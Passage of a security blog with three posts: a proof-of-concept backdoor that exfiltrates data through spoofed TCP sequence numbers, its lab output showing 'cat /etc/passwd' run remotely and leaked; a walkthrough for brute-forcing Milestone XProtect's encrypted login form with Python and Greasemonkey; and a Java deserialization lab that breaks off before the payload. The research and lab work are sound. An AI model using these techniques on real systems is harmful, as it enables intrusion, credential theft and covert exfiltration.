So it seems this type of attack, in which knowing the sequence numbers aids in forging a spoofed packet, has been used in two very specific manners:

  • Old Skool on local networks to inject into TCP streams
  • NSA style by globally monitoring connections and injecting packets

There is a third option however that hasn’t been explored yet as far as I know, which is using this technique to bypass IP filters for bi-directional communication. You might wonder when this might come in handy, right? After all most attackers are used to either directly exfiltrating through HTTPS or, in a worst case scenario, falling back to good old DNS. These methods however don’t cover some of the more isolated hosts that you sometimes encounter during an assignment.

During a couple of assignments I encountered multiple hosts which were shielded by a network firewall only allowing certain IP addresses to or from the box. The following diagram depicts the situation:

As you can see in the above diagram, for some reason the owner of the box had decided that communication with the internet was needed, but only to certain IP addresses. This got me thinking about how I could exfiltrate information. The easiest way was of course to exfiltrate the information in the same way that I had obtained access to the box, which was through SSH and password reuse. I didn’t identify any other methods of exfiltration during the assignment. This was of course not the most ideal way out, since it required passing the information through multiple infected hops in the network, which could attract some attention from the people in charge of defending the network.

A more elegant way in my opinion would have been to directly exfiltrate from the machine itself and avoid having a continuous connection to the machine from within the network. In this post we are going to explore the solution I found for this challenge, which is to repurpose the well known quantum insert technique to attempt to build a bi-directional communication channel with spoofed IP addresses, enabling exfiltration from these types of isolated hosts. If you are thinking ‘this only works if IP filtering or anti address spoofing is not enforced’ then you are right. So besides the ongoing DDoS attacks, this is yet another reason to block outgoing spoofed packets.

If you are already familiar with IP spoofing, forging packets and quantum insert you can also skip the rest of this post and jump directly to QIBA – A quantum insert backdoor POC. Please be aware that I only tested this in a lab setup, no guarantees on real world usage :)

Lastly, as you are probably used to by now, the code illustrates the concept and proves it works, but it’s nowhere near ready for production usage.

The concept

The end goal is pretty clear right? All we want is to be able to obtain bi-directional communication from an isolated host (whitelisted IP addresses, no dns) towards a host on the internet. The following diagram depicts the way we want to achieve this by illustrating one way communication:

Let’s go through the above image and explain some additional details:

  1. Control Connection
    • This is a connection we set up to the whitelisted machine so that we can control the data rate on it and use it to receive injected packets
  2. Leak
    • We leak the following information
      • ControlConnection source port
      • ControlConnection sequence number
      • ControlConnection acknowledgment number
    • We use SYN packets towards the whitelisted machine with the SPOOFED IP address of our attack server
  3. Receive Leak
    • The whitelisted machine will respond with a SYN/ACK towards our attack server, thus enabling us to receive the leaked information
  4. Inject spoofed packet
    • We now have all the information necessary to send a packet towards our infected machine SPOOFING the IP address of the whitelisted machine
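The leak in steps 2 and 3 works because TCP echoes our chosen values back: the SYN/ACK the whitelisted machine sends to our attack server acknowledges the spoofed SYN’s sequence number plus one, so whatever 32 bits we stuff into that sequence number arrive at the server. A minimal sketch of such an encoding (pure Python; the tag/data split and function names are made up for illustration, the actual POC encodes things differently):

```python
import struct

def encode_leak(tag16, data16):
    """Pack a 16-bit tag (e.g. which field is being leaked) and 16 bits
    of data into the 32-bit seq field of a spoofed SYN."""
    return struct.unpack('>I', struct.pack('>HH', tag16, data16))[0]

def decode_leak(ack_number):
    """Recover the leaked values on the attack server side from the
    SYN/ACK, which acknowledges our spoofed seq + 1."""
    raw = struct.pack('>I', (ack_number - 1) & 0xFFFFFFFF)
    tag16, data16 = struct.unpack('>HH', raw)
    return tag16, data16
```

The actual packet crafting around these values is done with scapy, as shown in the POC output later on.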

The POC

Before we start building the actual tool, let’s first see if the concept is viable by building a small POC which demonstrates the ability to inject data towards an isolated host. This is something that we know is possible since it has been done before, but it doesn’t hurt to replicate it, since it forms the basis for the rest of the tool we want to build.

We need to build the following components:

On the infected host (poc_client.py)

  • A control connection
  • A sniffer
  • A way to leak sequence numbers

On the command & control server (poc_server.py)

  • A way to identify the leaked sequence numbers
  • Something that injects the packets towards our hosts

So this is by no means fully bi-directional, but it implements just enough logic to give us confidence that the rest of the concept will also work. The first thing to notice is that using IP spoofing you can exfiltrate information from an isolated host by encoding it in, for example, the sequence number, with the downside that it’s a low bandwidth channel.

The POC is a bit messy and sometimes doesn’t work, but the points we talked about before are there and demonstrate at least a half-duplex capability of injecting controlled packets towards an isolated host, with the clear potential of evolving into a bi-directional channel. If everything goes alright the control connection should receive the words “INJECT” and “WIPE”. With a bit of imagination you can think of some useful things to do with the POC yourself, for example:

  • Inject new C&C IP address towards an isolated host
  • Initiate a WIPE action of files or hosts
  • Transmit commands to execute

It’s of course more interesting to be able to also receive data in the same way, which would actually enable us to control an isolated host even when it’s fully shielded and is only allowed to talk to one IP address. So let’s try and build a backdoor that works using this principle.

QIBA – A quantum insert backdoor

The POC basically contains everything we need to create a bi-directional backdoor, because the following building blocks are already present:

  • receive data from an injected packet into the control connection
  • leak data through the seq/ack numbers of the whitelisted host

The main difference is that you need to implement additional signalling and the ability to execute commands, as well as cutting the command output into small chunks. Due to the properties of TCP/IP you also have to account for duplicate packets, since the TCP/IP stack of the whitelisted IP will resend packets when it receives no answer. To compensate for this you just need to add a small one byte checksum to each packet so that you can recognise it when you receive it. Yes, this does further limit the bandwidth from 4 to 3 bytes, c’est la vie. The checksum I chose is pretty simple and thus not ideal, but it works for now:

if ((ord(encdata[0]) + ord(encdata[1]) + ord(encdata[2])) % 0xff) == ord(encdata[3]):

Like you can see, I just add all the bytes and mod the sum by 255, which for now seems to be more than enough. Additionally, to ensure that I receive all the data in the correct order, I implemented some timeouts which seem to do the job just fine. In a more real world implementation you’d add a more robust signalling protocol as well as some error correcting codes. Let’s see how this all looks:
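The chunk-plus-checksum scheme described above can be sketched as follows (Python 3 for brevity, while the POC itself is Python 2; the function names are made up for illustration):

```python
def add_checksum(chunk):
    """Turn 3 bytes of command output into the 4 bytes that get
    encoded into a sequence/acknowledgement number."""
    assert len(chunk) == 3
    return chunk + bytes([sum(chunk) % 0xff])

def is_valid(packet_bytes):
    # Same check as the POC: the sum of the three data bytes mod 255
    # must match the trailing checksum byte, so retransmitted
    # duplicates of an already-seen packet can be recognised
    return sum(packet_bytes[:3]) % 0xff == packet_bytes[3]
```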

The server

sudo python qiba_server.py 172.16.218.152 172.16.218.168 8080 "cat /etc/passwd"
Injecting::::::: <IP frag=0 proto=tcp src=172.16.218.152 dst=172.16.218.168 |<TCP sport=http_alt dport=43294 seq=729684595 ack=1783071637 flags=PA |<Raw load='cat /etc/passwd:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |>>>
.
Sent 1 packets.
cmdoutput::::::: roo
cmdoutput::::::: t:x
cmdoutput::::::: t:x
cmdoutput::::::: :0:
cmdoutput::::::: 0:r
cmdoutput::::::: t:x
cmdoutput::::::: oot
cmdoutput::::::: :/r
cmdoutput::::::: oot
cmdoutput::::::: :/b
cmdoutput::::::: t:x
[...]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologinnc:x:4:65534:sync:/bin:/bin/sync

The client

sudo ./qiba_client.py 172.16.218.152 172.16.218.174 8080
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
Getdata attempt:::::::
RECEIVED::::::: cat /etc/passwd:aaaaaaaaaaaaaa[...]
CMD::::::: cat /etc/passwd
CMD OUTPUT::::::: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
Exfildata::::::: rooQ
Exfildata enc::::::: 726f6f51
Exfildata int::::::: 1919905617
.
Sent 1 packets.
Exfildata::::::: t:x'
Exfildata enc::::::: 743a7827
Exfildata int::::::: 1949988903
.
Sent 1 packets.
Exfildata::::::: :0:�
Exfildata enc::::::: 3a303aa4
Exfildata int::::::: 976239268

Well that looks like fun right? We are now controlling a host that is only allowed to talk to a single IP using spoofed packets and sequence / acknowledgement numbers as the exfiltration channel.

Restrictions & practical applications

While the QIBA POC proves that the concept works, there are of course a couple of limitations:

  • The whitelisted host should not implement IP or port whitelists itself
  • The victim should be able to spoof IP addresses
  • The attacker needs to know the IP address of the victims

Which might make you wonder what the practical uses of this concept can be? Well I’d say the following are pretty realistic:

  • prove that an infection has succeeded by notifying the C&C regardless of IP whitelists
  • exfiltrate information regardless of IP whitelists

The reason that I deem the above realistic is that the only thing the infection needs to do is monitor the current connections and attempt to exfiltrate through the IPs it sees. This has of course no guarantee whatsoever, but it’s better than not being able to exfiltrate at all in my opinion :)


Filed under: general, midnight thoughts Tagged: exfiltration, nsa, python, quantum insert, scapy, tcp

Brute forcing encrypted web login forms


There are a ton of ways to brute force login forms; you just need to google for it and the first couple of hits will usually do. That is of course unless you have Burp, in which case it will be sufficient for most of the forms out there. Sometimes however it will not be so straightforward and you’ll need to write your own tool(s). This can be for a variety of reasons, but usually it boils down to either a custom protocol over HTTP(S) or some custom encryption of the data entered. In this post we are going to look at two ways of writing these tools:

  • Your own python script
  • A Greasemonkey script

Since to write both tools you first need to understand and analyse the non-default login form let’s do the analysis part first. If you want to follow along you’ll need the following tools:

  • Python
  • Burp free edition
  • Firefox with the Greasemonkey plugin
  • FoxyProxy
  • FireFox developer tools (F12)

Please note that even though we are using some commercially available software as an example, this is NOT a vulnerability in the software itself. Most login forms can be brute forced, some forms slower than others ;) As usual you can also skip the blog post and directly download the python script & the Greasemonkey script. Please keep in mind that they might need to be adjusted for your own needs.

The problem

Sometimes you stumble upon interesting login forms like the one from the Milestone XProtect software. I’ve not performed any configuration of the XProtect software and it seems that it uses the Windows login credentials for authentication on the web form.

Our target will be the ‘Web Client’ part of the software for which you can login with a username and password. If you have configured foxyproxy correctly, then your requests should go through burp before they hit the XProtect login form. Please note that if you are running XProtect on localhost you might need to configure firefox so that it does NOT bypass the proxy settings for localhost, 127.0.0.1.

So when you attempt to login you should see the following two requests in burp:

First login request

Second login request

Now if you attempt to base64 decode the username and password values you end up with gibberish; the same goes for the initial long base64 string in the first request. Additionally it seems that it needs two requests for every single login. Looks like we’ve found our candidate on which to perform further analysis.

Analysis

First of all let’s look at the data in each of the request and response messages.

This is the first request, and we can already spot different things that might help us better understand what type of transformation is happening to our username and password values. The following XML parameters caught my eye:

  • PublicKey
  • EncryptionPadding

This is the response to the first request and just like the first request, the following XML parameters caught my eye:

  • ConnectionId
  • PublicKey

The response contains other interesting information which might even be interpreted as information disclosure, but for our purpose today we’ll just ignore that information.

Now this is the request that actually contains our, probably encrypted, username and password. The only XML parameter that caught my eye was:

  • ConnectionId

The response contains a ‘<Result>’ XML tag which lets us know if the login was successful or not. Unfortunately it is not visible on the screenshot since I cut off the bottom half.

Based on the information gathered so far we could draw the following conclusion:

  1. The client sends a public key to the server
  2. The server sends a public key to the client
  3. Magic happens and the credentials are encrypted
    1. Apparently the encryption mode uses ‘ISO10126’ padding

So does the above remind us of anything? YES, of course it does! This seems to be a textbook Diffie Hellman key exchange. The padding mode indicates that the encryption is most probably a block cipher, since if you google for it you’ll find this wikipedia article. We can deduce some more information if we perform some active probing. If we enter a single ‘a’ as a password and then decode the value it will be 16 bytes long. Spaces have been added for clarity:

Input        : a
Base64       : qlqsMXD7uS/Kl15iyIIlxA==
Decoded bytes: aa 5a ac 31 70 fb b9 2f ca 97 5e 62 c8 82 25 c4

If we enter fewer than 16 ‘a’ characters it remains 16 bytes.

Input        : aaaa aaaa aaaa aaa
Base64       : PIV8H1Rg3KuVi+GyhYsPsg==
Decoded bytes: 3c 85 7c 1f 54 60 dc ab 95 8b e1 b2 85 8b 0f b2

However if we enter 16 ‘a’ characters or more it will result in 32 bytes.

Input        : aaaa aaaa aaaa aaaa a
Base64       : G3vCXn54ZV6gHq9hxV+S0ElFs619AccEnvq2WMRKPMQ=
Decoded bytes: 1b 7b c2 5e 7e 78 65 5e a0 1e af 61 c5 5f 92 d0 49 45 b3 ad 7d 01 c7 04 9e fa b6 58 c4 4a 3c c4

This indicates that it is most probably a block cipher with blocks of 16 bytes. If that doesn’t ring a bell: converted to bits (8*16) that results in blocks of 128 bits, which will probably make you think of AES, even though we have no further evidence.
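A quick way to double check the block-size reasoning is to decode the captured samples and look at the length jumps (the base64 strings are the ones captured above):

```python
import base64

# (plaintext length, captured base64 ciphertext) pairs from the probes above
samples = [
    (1,  'qlqsMXD7uS/Kl15iyIIlxA=='),
    (15, 'PIV8H1Rg3KuVi+GyhYsPsg=='),
    (17, 'G3vCXn54ZV6gHq9hxV+S0ElFs619AccEnvq2WMRKPMQ='),
]
for plain_len, b64 in samples:
    print(plain_len, len(base64.b64decode(b64)))
# the ciphertext length jumps from 16 to 32 bytes once the input
# reaches a full block, pointing at a 128-bit block cipher
```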

We’ll figure out the exact block cipher, and confirm that it is indeed a Diffie Hellman key exchange, while we attempt to write our brute forcing script.

Our python script

Now that we at least have somewhat of an idea of what we have to implement, let’s get to work. Which in this case doesn’t mean get coding, but it means dive further into the inner workings of the encryption and then do some coding.

Since all of the encryption happens in the browser, it is a good start to look at the javascript. When you look at the files in the /js/ folder you can quickly identify that ‘main.js’ probably contains all the logic, just due to its sheer size. The first thing you have to do is beautify the javascript code, either using the built-in developer tools or using a custom plugin for your favourite editor like Atom or Sublime.

After doing that there are a couple of different strategies to locate the interesting code, one of my favourite ones is to just search for any of the previously identified crypto strings like ‘padding’, ‘ISO10126’ or search for default crypto strings like ‘encrypt’, ‘decrypt’, ‘aes’, ‘diffie hellman’, ‘random’. All of these search terms land you in the crypto code that we are looking for within the main.js file. Let’s see how to understand this without the need of fully understanding all the code.

The compatibility check

One thing I learned long ago when dealing with cryptographic implementations across programming languages is to keep in mind that the implementations might differ, and you should prepare for some long debugging sessions. To avoid that, I always try to find an easy to implement, yet important, part of the cryptography and implement only that part to verify the cryptography is compatible. Although it’s not a 100 percent test, it does give you some insight.

For this compatibility test I chose to port the encryption of the username and password first, assuming it was probably AES and easy to implement. The assumed logic was as follows:

  • Debug javascript & find AES operation
  • Extract encryption key
  • Create python decryptor

Fire up the developer tools and place a break point on the following places:

  • loginSubmit: function(a) {
  • Connection.login(a)
  • aP.Username = at.dh.encodeString(aP.Username);
  • aP.Password = at.dh.encodeString(aP.Password)

If you wonder why on those places: when you look into the HTML of the page you see that the form and the submit button have their ‘onsubmit’ and ‘onclick’ set to ‘loginSubmit’. If you then go to the ‘main.js’ file and search for that string, you find it in exactly one place. Using some good old fashioned reading (read down from that line) and applying some trial and error break points, you can follow the execution flow and discover the above mentioned interesting function calls yourself. During the debug sessions I noticed that the Chrome developer tools seemed to work way better than the Firefox ones, as in: my break points actually triggered.

When you step over (sometimes into) those functions you should be able to see the exact moment when your input is encrypted. So if we step into the ‘encodeString’ function we see the source for encrypting our string:

this.encodeString = function(r) {
    var o = this.getSharedKey().substring(0, 96);
    var n = CryptoJS.enc.Hex.parse(o.substring(32, 96));
    var m = CryptoJS.enc.Hex.parse(o.substring(0, 32));
    var q = {
        iv: m
    };
    if (Settings.DefaultEncryptionPadding && CryptoJS.pad[Settings.DefaultEncryptionPadding]) {
        q.padding = CryptoJS.pad[Settings.DefaultEncryptionPadding]
    }
    return CryptoJS.AES.encrypt(r, n, q).ciphertext.toString(CryptoJS.enc.Base64)
}

If you step through the above code and read it then you can conclude the following:

  • o is probably the result from the diffie hellman key exchange
  • q & m are the IV
  • n is the actual encryption key
  • r is the string to encrypt

So that means that if we take the encrypted value from our debugger and the value of the 'o' variable we should be able to decrypt it. You might be like: but you are missing the mode of operation!! Yes, you are correct, but our aim is to not fully understand all the code, so let's wing it ;) To run the code snippet below you need to 'pip install pycrypto' and 'pip install Padding'.

#decrypt values if key is known (Python 2)
import base64
from Crypto.Cipher import AES
from Padding import removePadding

encdata = base64.urlsafe_b64decode('9OTg1OvudO7jOYOrnkttMA==')
aesrawkey = '6b0df8a5406348aab2aa0883c3b3f4e55b45e00ad6959f7468e25e88c3eb166a3ee8934ceda08e4116b7afc05eae4d6c'
aeskey = aesrawkey[32:96].decode('hex')
aesiv = aesrawkey[0:32].decode('hex')
cipher = AES.new(aeskey, AES.MODE_CBC, aesiv)
print removePadding(cipher.decrypt(encdata), 16, 'Random')

If you run the above it should print ‘sdf’ which is the username I entered into the username field. Now this is good, it means that the cryptography seems to be compatible without any special kind of effort.
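The key/IV slicing that encodeString() performs can also be checked on Python 3 with nothing but the standard library (the decryption itself still needs an AES implementation); aesrawkey below is the example session value captured in the debugger:

```python
# Python 3 sketch of the key/IV split performed by encodeString()
aesrawkey = '6b0df8a5406348aab2aa0883c3b3f4e55b45e00ad6959f7468e25e88c3eb166a3ee8934ceda08e4116b7afc05eae4d6c'
aesiv = bytes.fromhex(aesrawkey[0:32])    # first 16 bytes -> CBC IV
aeskey = bytes.fromhex(aesrawkey[32:96])  # next 32 bytes -> AES-256 key
assert len(aesiv) == 16 and len(aeskey) == 32
```

This makes it explicit that the shared secret doubles as both IV and key material, which is exactly what the python port has to reproduce.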

The diffie hellman implementation

At the core of what we need is the Diffie-Hellman key exchange (DHke) implementation. The reason is that the actual encryption key is derived from it, so without it we are doomed. In the previous paragraph we already spotted one of the DHke functions: getSharedKey(). If you step into that function and then scroll up, you are right in the middle of all the DHke code, namely:

Creating the private key

var g = randBigInt(160, 0);

Create the public key

this.createPublicKey = function() {
 var n = b(e(bigInt2str(powMod(d, g, f), 16)));
 n.push(0);
 var m = Base64.encodeArray(n);
 return m
 }

Create the shared key

this.getSharedKey = function() {
 var m = b(e(bigInt2str(powMod(str2bigInt(l, 16, 1), g, f), 16)));
 return CryptoJS.enc.Base64.parse(Base64.encodeArray(m)).toString()
 }

If you read up on Diffie-Hellman it is pretty doable to port it to python; in the script you can read the full implementation. Here are the three functions in python:

from random import getrandbits
import base64

def genprivkey():
    return getrandbits(160)

def genpubkey(g, prkey, prime):
    pubkey = pow(g, prkey, prime)
    packedpubkey = pack_bigint(pubkey)
    return base64.b64encode(bytes(packedpubkey))

def gensharedkey(rpubkey, privkey, prime):
    decrkey = base64.b64decode(rpubkey)
    rkey = unpack_bigint(decrkey)
    sharedkey = pow(rkey, privkey, prime)
    return sharedkey

The biggest pitfall I was stuck on for a while is the way you need to work with big integers: if you want to encode them, slice them into separate bytes, etc., you have to pack/unpack them!! Here are the code snippets as borrowed from stackoverflow:

def pack_bigint(i):
    #https://stackoverflow.com/a/14764681
    b = bytearray()
    while i:
        b.append(i & 0xFF)
        i >>= 8
    return b

def unpack_bigint(b):
    #https://stackoverflow.com/a/14764681
    b = bytearray(b)  # in case you're passing in a bytes/str
    return sum((1 << (bi*8)) * bb for (bi, bb) in enumerate(b))
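To convince yourself that the pack/unpack helpers and the key exchange actually interoperate, both sides of the exchange can be simulated locally. A minimal sketch, using a toy 64-bit prime for illustration only (the real prime and generator come from the server's XML response):

```python
import base64
from random import getrandbits

def pack_bigint(i):
    b = bytearray()
    while i:
        b.append(i & 0xFF)
        i >>= 8
    return b

def unpack_bigint(b):
    b = bytearray(b)
    return sum((1 << (bi * 8)) * bb for (bi, bb) in enumerate(b))

# toy parameters for illustration only
prime, g = 2**64 - 59, 5

apriv, bpriv = getrandbits(60), getrandbits(60)
apub = base64.b64encode(bytes(pack_bigint(pow(g, apriv, prime))))
bpub = base64.b64encode(bytes(pack_bigint(pow(g, bpriv, prime))))

# each side combines its own private key with the other side's public key
shared_a = pow(unpack_bigint(base64.b64decode(bpub)), apriv, prime)
shared_b = pow(unpack_bigint(base64.b64decode(apub)), bpriv, prime)
assert shared_a == shared_b
```

If both sides end up with the same shared key, the base64/pack/unpack plumbing is correct, which was exactly the part that cost me the debugging time.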

With the core of the diffie hellman key exchange in place the rest of the script is self explanatory. It creates the XML requests, does the necessary parsing to read/write the values and sends/receives the requests. The script is sometimes a bit wonky…but to demonstrate this process it is fine in my opinion :)

Greasemonkey: the last resort

What if the previous analysis had failed or some strange cryptographic interoperability bug had appeared? In that case it's nice to have a backup option that works (more or less) universally and doesn't require us to fully understand what is going on. Of course it also has some drawbacks, like less speed (although my coding skills are probably to blame).

The universal solution I chose was to create a Greasemonkey script, since this enables you to control the form as if you were entering credentials and submitting them manually yourself. The most important restriction of a Greasemonkey script is that, as far as I know, you cannot (easily) read local files to use as input for your brute force attempts. This results in the script containing the usernames and passwords to test embedded as arrays. The script can more or less easily be adapted to brute force other login forms.

 

The above screenshot shows the result of the Greasemonkey script in which you can see an added button to start the brute force, as well as the current attempt scrolling by in the developer tool console. The logic that we need to implement for the script is pretty straightforward:

  • Display a button on the website to start brute forcing
  • Loop through username and password combinations
  • Attempt to login
  • Detect if the attempt was successful

Most of the above logic is not difficult, it just takes some getting used to how browsers and JavaScript work (a lot of event driven programming). Luckily for us stackoverflow exists (the code contains references to the answers used) and we don’t need it to be the most beautiful script in the world (thus ignoring part of the event driven approach). I’ll explain a couple of interesting highlights from the script:

Attempt login, sleep, attempt again

This is the part where I really created ugly code, since I didn't expect JavaScript to not have a sleep function. After reading up on it and experimenting with sleep alternatives it makes sense, since sleeping would freeze your browser. So I ended up wrapping the entire thing in a function and calling that function with setInterval every 5 seconds. This of course implies that I have to keep some form of state, and thus I went all crazy with global variables :( More precisely, I replaced for loops with while loops and global variables so that I can exit the while loop after each attempt, but resume at that exact point when the function gets called again.

The actual submission of the form took some searching around and reading, since the default approach that I encountered in most examples didn't work. Normally you can grab the form element or the submit button element and call the click() or submit() functions on them. I didn't fully figure out why, but for this specific form that did not work. The following however works great and should be pretty universal:


 //https://stackoverflow.com/a/6337307
 var evt = document.createEvent ("HTMLEvents");
 evt.initEvent ("click", true, true);
 document.getElementById('loginWindow_submit').dispatchEvent(evt);

Detecting a successful login

//https://stackoverflow.com/a/2497223
var oldTitle = document.title;
window.setInterval(function()
{
 if (document.title !== oldTitle)
 {
 console.log("[!!!!!!!!] YAY! "+currUsr+" "+currPwd);
 if (currUsr != ""){
 foundcreds = 1;
 }
 }
 oldTitle = document.title;
}, 100); //check every 100ms

The above code uses the setInterval function to check for changes of the page title every 100 milliseconds. You could also solve this by subscribing to events, but this seemed easier to understand as well as pretty generic, since most websites change the title when you successfully log in.

The rest of the script is pretty self explanatory and should be reusable, although I haven't tested that. Developing these types of scripts doesn't take long and they are in my opinion a good fallback when the cryptographic operations become too complicated or custom, or you just don't have enough time to go through them.

Conclusion

If you lasted till here, thank you for taking your time in reading this blog post! I hope you learned an additional approach towards brute forcing forms that implement some form of data encryption. As usual the road towards the tools is much more interesting than the tools themselves :)


Filed under: general, security Tagged: AES, diffie-hellman, encryption, greasemonkey, javascript, milestone xprotect, python

Understanding & practicing java deserialization exploits


A good periodic reminder when attempting to learn things is that reading about the subject is not the same as actually practicing the subject you read about. That is why it’s always a good thing to practice what you have read. In this case we are going to dive into the well known Java deserialization bugs that have been around for a while now. The best part of practicing it is that you get to really know the subject at hand and can attempt to improve upon it for your own needs. For this blog post we are going to attempt the following:

  1. Exploit a deserialization bug
  2. Manually create our payload

So to clarify, step one will be about practicing the exploitation of a serialization bug with current tools as well as explaining the approach taken. The second step zooms in on the payload; what exactly is the payload? How can we construct it by hand? With the end result of fully understanding how it works as well as having an approach to understand similar bugs in the future.

I’ll mention all tools used throughout the blog post, but at the very least you’ll need the following:

That is the bug we will be exploiting. The reason for choosing a simulated bug is the fact that we can control all aspects of it and thus better understand how a deserialization exploit really works.

Exploiting DeserLab

First of all make sure you read the blog post in which DeserLab is presented and java deserialization is explained. One of the nicer things of this blog post is the in depth information on the Java serialization protocol itself. Be aware that by continuing to read this section you’ll spoil solving DeserLab yourself. For the rest of this section we’ll be working with the precompiled jar files, so make sure you download those from his github. Now let’s get started:

My usual approach for most problems is to first understand how the target operates in a normal manner. For DeserLab this means we need to do the following:

  • Run the server and client
  • Capture the traffic
  • Understand the traffic

For running the server and client you can use the following commands:

java -jar DeserLab.jar -server 127.0.0.1 6666
java -jar DeserLab.jar -client 127.0.0.1 6666

The input/output from the above commands looks like this:

java -jar DeserLab.jar -server 127.0.0.1 6666
 [+] DeserServer started, listening on 127.0.0.1:6666
 [+] Connection accepted from 127.0.0.1:50410
 [+] Sending hello...
 [+] Hello sent, waiting for hello from client...
 [+] Hello received from client...
 [+] Sending protocol version...
 [+] Version sent, waiting for version from client...
 [+] Client version is compatible, reading client name...
 [+] Client name received: testing
 [+] Hash request received, hashing: test
 [+] Hash generated: 098f6bcd4621d373cade4e832627b4f6
 [+] Done, terminating connection.

java -jar DeserLab.jar -client 127.0.0.1 6666
 [+] DeserClient started, connecting to 127.0.0.1:6666
 [+] Connected, reading server hello packet...
 [+] Hello received, sending hello to server...
 [+] Hello sent, reading server protocol version...
 [+] Sending supported protocol version to the server...
 [+] Enter a client name to send to the server:
 testing
 [+] Enter a string to hash:
 test
 [+] Generating hash of "test"...
 [+] Hash generated: 098f6bcd4621d373cade4e832627b4f6

The above is not really what we are after, since the main question is of course, how does it implement the deserialization part? To answer this question you can capture the traffic on port 6666 with wireshark, tcpdump or tshark. To capture the traffic with tcpdump you can execute the following command:

tcpdump -i lo -n -w deserlab.pcap 'port 6666'

Before you read any further make sure you browse through the pcap file using wireshark. Together with Nick's blog post you should be able to manually understand what is going on and at the very least identify that serialized Java objects are being passed back and forth:

Extraction of serialized data

Now that we have a pretty strong indication that serialized data is being transmitted, let's start to understand what is actually being transmitted. Instead of writing my own parser based on the information provided in the blog post, I decided to use SerializationDumper, which is one of the tools mentioned, as well as jdeserialize, an older but still functional tool. Before we can use either of those tools we need to prepare the data, so let's transform the pcap into data that we can analyze.

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=, | grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

Now that one-liner can probably be shortened a lot, but for now it works. Let's split it into digestible chunks, since all it does is convert the pcap data into a single line of hex encoded output. The first thing it does is convert the pcap into a text representation containing only the data transmitted and the TCP source and destination port numbers:

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=,

Which looks like this:

50432,,6666
6666,,50432
50432,,6666
50432,aced0005,6666
6666,,50432
6666,aced0005,50432

As you can see in the above snippet, during the TCP three-way handshake there is no data, hence the ',,' part. After that the client sends the first bytes, which get ACKed by the server, then the server sends some bytes back and so forth. The second part of the command converts this into a string with just the payloads, selected based on the port at the beginning of the line:

| grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

The above only selects the server replies; if you want the client data you need to change the port number. The end result looks like this:

aced00057704f000baaa77020101737200146e622e64657365722e486[...]
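The filtering half of that shell pipeline can also be expressed in a few lines of Python, which makes the selection logic easier to see (the sample rows below are invented for illustration):

```python
# keep only the server->client rows (source port 6666) that actually carry
# data, then concatenate their hex payloads -- same job as the grep/cut part
rows = [
    '50432,,6666',
    '6666,,50432',
    '6666,aced0005,50432',
    '6666,7704f000baaa,50432',
]
payload = ''.join(r.split(',')[1] for r in rows
                  if r.startswith('6666,') and ',,' not in r)
assert payload == 'aced00057704f000baaa'
```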

That is something we can work with, since it is a clean representation of the data sent and received. Let's analyse this with both tools: first SerializationDumper, then jdeserialize. If you are wondering why both tools: because it is just good practice (if possible) to perform analysis with different tools to spot potential bugs or issues. If you stick to one tool you might be heading down the wrong path without noticing. It is also just fun to try out different tools ;)

Analysis of serialized data

With SerializationDumper it is pretty straightforward, since you can just pass the hex representation of the serialized data as the first argument like this:

java -jar SerializationDumper-v1.0.jar aced00057704f000baaa77020101

Which should result in output similar to the following:

STREAM_MAGIC - 0xac ed
STREAM_VERSION - 0x00 05
Contents
 TC_BLOCKDATA - 0x77
 Length - 4 - 0x04
 Contents - 0xf000baaa
 TC_BLOCKDATA - 0x77
 Length - 2 - 0x02
 Contents - 0x0101
 TC_OBJECT - 0x73
 TC_CLASSDESC - 0x72
 className
 Length - 20 - 0x00 14
 Value - nb.deser.HashRequest - 0x6e622e64657365722e4861736852657175657374
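The handshake bytes at the start of that dump are simple enough to verify by hand. A minimal Python parser for just STREAM_MAGIC, STREAM_VERSION and TC_BLOCKDATA records (nowhere near the full serialization grammar) could look like this:

```python
import struct

data = bytes.fromhex('aced00057704f000baaa77020101')

# STREAM_MAGIC (0xaced) and STREAM_VERSION (5) are two big-endian shorts
magic, version = struct.unpack('>HH', data[:4])
assert magic == 0xaced and version == 5

# walk the TC_BLOCKDATA (0x77) records: a 1-byte length follows the tag
i, blocks = 4, []
while i < len(data):
    assert data[i] == 0x77
    length = data[i + 1]
    blocks.append(data[i + 2:i + 2 + length])
    i += 2 + length
assert blocks == [bytes.fromhex('f000baaa'), bytes.fromhex('0101')]
```

The recovered blocks match the two Contents lines in the SerializationDumper output above.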

If we want to analyse the same serialized data with jdeserialize we have to build it first; you can use ant for that with the provided build.xml file. I opted for manual compilation, which you can achieve with the following commands:

mkdir build
javac -d ./build/ src/*
cd build
jar cvf jdeserialize.jar *

The above should produce a jar file that we can work with, to test it you can run it like this and it should display the help information:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize

Since jdeserialize expects a file, we can convert the hex representation of the serialized data as follows with python (mind the shortening of the hex strings for blog layout purposes):

open('rawser.bin','wb').write('aced00057704f000baaa770201[...]3236323762346636'.decode('hex'))
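Note that the 'hex' codec above is Python 2 only; on Python 3 the same file can be written with bytes.fromhex (payload shortened here as well):

```python
# Python 3 equivalent of the one-liner above; str.decode('hex') is gone
with open('rawser.bin', 'wb') as f:
    f.write(bytes.fromhex('aced00057704f000baaa'))
```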

We can now analyse this file by running jdeserialize with the file name as the first argument which should produce:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize rawser.bin
 read: [blockdata 0x00: 4 bytes]
 read: [blockdata 0x00: 2 bytes]
 read: nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
 //// BEGIN stream content output
 [blockdata 0x00: 4 bytes]
 [blockdata 0x00: 2 bytes]
 nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
 //// END stream content output

//// BEGIN class declarations (excluding array classes)
